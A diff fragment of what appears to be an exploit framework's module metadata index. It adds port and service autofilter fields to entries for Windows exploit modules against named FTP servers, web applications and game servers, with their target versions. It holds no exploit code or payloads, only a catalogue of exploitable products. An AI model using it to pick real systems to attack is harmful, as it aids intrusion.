"", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "FreeFloat / Windows XP SP3" ], @@ -77602,6 +100528,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "FreeFloat" ], @@ -77636,6 +100569,13 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "freeFTPd 1.0.10 and below on Windows Desktop Version" ], @@ -77669,6 +100609,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows 2000 English ALL", @@ -77706,6 +100653,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -77738,6 +100691,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Professional, English - shlwapi 6.00.2900.5912", "XP SP3 Professional, German - shlwapi 6.00.2900.5912", @@ -77772,6 +100731,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -77805,6 +100770,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -77837,6 +100808,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP Universal" ], @@ -77870,6 +100847,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -77905,6 +100888,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "GlobalSCAPE Secure FTP Server <= 3.0.2 Universal" ], @@ -77941,6 +100931,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows XP Pro SP3", @@ -77976,6 +100973,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "httpdx 1.4 - Windows XP SP3 English", @@ -78014,6 +101018,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 7 SP1 x86" ], @@ -78047,6 +101058,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -78080,6 +101097,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -78114,6 +101137,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal LeapFTP.exe", "Windows 2000 SP0/4 English", @@ -78152,6 +101181,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 SP4 English/Italian (IIS 5.0)", "Windows 2000 SP3 English (IIS 5.0)", @@ -78188,6 +101224,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "NetTerm NetFTPD Universal", "Windows 2000 English", @@ -78225,6 +101268,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -78259,6 +101308,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Open&Compact FTP 1.2 on Windows (Before Vista)" ], @@ -78293,6 +101349,13 @@ "platform": "Windows", "arch": "", "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Oracle 9.2.0.1 Universal" ], @@ -78328,6 +101391,13 @@ "platform": "Windows", "arch": "", "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Oracle 9.2.0.1 Universal" ], @@ -78362,6 +101432,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3 English" ], @@ -78396,6 +101473,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3 English" ], @@ -78429,6 +101513,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -78464,6 +101554,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "QuickShare File Server 1.2.1" ], @@ -78499,6 +101596,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3" ], @@ -78533,6 +101637,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Sami FTP Server 2.0.1 / Windows XP SP3" ], @@ -78574,6 +101685,12 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro All - English", @@ -78611,6 +101728,13 @@ "platform": "Windows", "arch": "x86", "rport": 5554, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP0", "Windows XP SP1" @@ -78648,6 +101772,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows Vista" ], @@ -78680,6 +101810,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP Universal" ], @@ -78713,6 +101849,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 SP0-4 EN", "Windows XP SP0-1 EN" @@ -78748,6 +101891,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Serv-U Uber-Leet Universal ServUDaemon.exe", "Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe", @@ -78783,6 +101933,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "SlimFTPd Server <= 3.16 Universal" ], @@ -78817,6 +101974,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -78852,6 +102015,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows Universal TurboFtp 1.30.823", @@ -78886,6 +102056,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "vftpd 1.31 - Windows XP SP3 English" @@ -78920,6 +102097,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000" ], @@ -78953,6 +102137,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows 2000 SP0-SP4 English", @@ -78990,6 +102181,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP1 English", @@ -79025,6 +102223,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -79056,6 +102260,21 @@ "platform": "Windows", "arch": "x86", "rport": 5466, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows VBS Stager" ], @@ -79090,6 +102309,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "WS-FTP Server 5.03 Universal" ], @@ -79123,6 +102349,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP0 English", @@ -79158,6 +102391,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -79191,6 +102430,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP3 English", "Windows 2000 SP4 English" @@ -79225,6 +102470,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Omni-NFS Enterprise V5.2" ], @@ -79259,6 +102511,12 @@ "platform": "Windows", "arch": "", "rport": 12203, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Medal Of Honor Allied Assault v 1.0 Universal" ], @@ -79293,6 +102551,12 @@ "platform": "Windows", "arch": "", "rport": 26000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Fmodex.dll - Universal", "Win XP SP2 English", @@ -79328,6 +102592,12 @@ "platform": "Windows", "arch": "", "rport": 7787, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "UT2004 Build 3186" ], @@ -79362,6 +102632,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -79395,6 +102680,21 @@ "platform": "Windows", "arch": "", "rport": 4000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "SecurityGateway 1.0.1 Universal" @@ -79430,6 +102730,21 @@ "platform": "Windows", "arch": "", "rport": 1000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "WebAdmin 2.0.4 Universal", @@ -79467,6 +102782,12 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro All - English" ], @@ -79501,6 +102822,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Generic Bruteforce", "Apache.org Build 1.3.9->1.3.19", @@ -79550,6 +102886,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -79584,6 +102935,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)" ], @@ -79620,6 +102977,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2" ], @@ -79653,6 +103025,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BadBlue 2.5 (Universal)" ], @@ -79686,6 +103073,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BadBlue EE 2.7 Universal", "BadBlue 2.72b Universal" @@ -79719,6 +103121,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Apache 2.2 - WebLogic module version 1.0.1136334", "Windows Apache 2.2 - WebLogic module version 1.0.1150354" @@ -79754,6 +103162,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", @@ -79789,6 +103212,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Apache 2.2 version Universal" ], @@ -79822,6 +103260,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 English" ], @@ -79856,6 +103309,21 @@ "platform": "Windows", "arch": "", "rport": 8014, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -79891,6 +103359,12 @@ "platform": "Windows", "arch": "", "rport": 5250, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iGateway 3.0.40621.0" ], @@ -79924,6 +103398,21 @@ "platform": "Windows", "arch": "", "rport": 34443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal" ], @@ -79958,6 +103447,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cogent DataHub < 7.3.5" ], @@ -79994,6 +103498,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 English / Cogent DataHub 7.3.0" ], @@ -80026,6 +103545,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -80059,6 +103593,21 @@ "platform": "Windows", "arch": "", "rport": 7879, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cyclope Employee Surveillance Solution v6.2 or older" ], @@ -80093,6 +103642,21 @@ "platform": "Windows", "arch": "x86", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Desktop Central v7 - v8 build 80292 / Windows" ], @@ -80126,6 +103690,21 @@ "platform": "Windows", "arch": "x86", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Desktop Central v7 to v9 build 90054 / Windows" ], @@ -80158,6 +103737,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Disk Pulse Enterprise 9.0.34" ], @@ -80190,6 +103784,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Disk Pulse Enterprise 9.9.16" ], @@ -80225,6 +103834,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "DiskBoss Enterprise v7.4.28", @@ -80261,6 +103885,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "DiskSavvy Enterprise v9.1.14", @@ -80294,6 +103933,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Disk Sorter Enterprise v9.5.12" ], @@ -80327,6 +103981,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dup Scout Enterprise 10.0.18" ], @@ -80359,6 +104028,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dup Scout Enterprise v9.5.14" ], @@ -80391,6 +104075,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Easy Chat Server 2.0 to 3.1" ], @@ -80423,6 +104122,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Easy File Sharing 7.2 HTTP" ], @@ -80454,6 +104159,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Easy File Sharing 7.2 HTTP" ], @@ -80487,6 +104198,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 - Easy FTP Server Universal" ], @@ -80520,6 +104246,12 @@ "platform": "Windows", "arch": "", "rport": 8028, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell eDirectory 8.8.1" ], @@ -80554,6 +104286,21 @@ "platform": "Windows", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows (ALL) - eDirectory 8.7.3 iMonitor" ], @@ -80589,6 +104336,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Easy Chat Server 2.0", @@ -80629,6 +104391,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Efmws 5.3 Universal", @@ -80667,6 +104444,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2003 SP2 / Ektron CMS400 8.02" ], @@ -80700,6 +104492,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2008 R2 / Ektron CMS400 8.5" ], @@ -80735,6 +104542,21 @@ "platform": "Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]" ], @@ -80769,6 +104591,12 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)" ], @@ -80801,6 +104629,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Free Download Manager 2.5 Build 758" ], @@ -80832,6 +104675,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows x86", "Windows x64" @@ -80867,6 +104725,12 @@ "platform": "Windows", "arch": "", "rport": 13003, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "GCore 1.3.8.42, Windows x64 (Win7+)", @@ -80904,6 +104768,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -80939,6 +104818,21 @@ "platform": "Java", "arch": "java", "rport": 5814, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", "Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", @@ -80978,6 +104872,21 @@ "platform": "Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows" ], @@ -81014,6 +104923,21 @@ "platform": "Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP Intelligent Management Center 5.1 E0202 / Windows" ], @@ -81050,6 +104974,21 @@ "platform": "Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP LoadRunner 11.52" ], @@ -81086,6 +105025,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]" ], @@ -81118,6 +105072,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50", "HP OpenView Network Node Manager 7.53" @@ -81151,6 +105120,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50", "HP OpenView Network Node Manager 7.53" @@ -81184,6 +105168,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50", "HP OpenView Network Node Manager 7.53" @@ -81219,6 +105218,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP NNM 7.53 Windows Server 2003 Enterprise", @@ -81254,6 +105268,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NNM 7.53 - Windows Server 2003 Ent" ], @@ -81287,6 +105316,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP OpenView Network Node Manager 7.50 / Windows 2000 All" ], @@ -81322,6 +105357,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53", "HP OpenView Network Node Manager 7.53 (Windows 2003)" @@ -81357,6 +105407,21 @@ "platform": "Windows", "arch": "", "rport": 7510, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Windows 2003/zip.dll OpenView 7.53", @@ -81396,6 +105461,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3" ], @@ -81429,6 +105509,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50" ], @@ -81463,6 +105558,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01201", "HP OpenView Network Node Manager 7.53 (Windows 2003)", @@ -81500,6 +105610,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01201", "HP OpenView Network Node Manager 7.53 (Windows 2003)", @@ -81536,6 +105661,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], 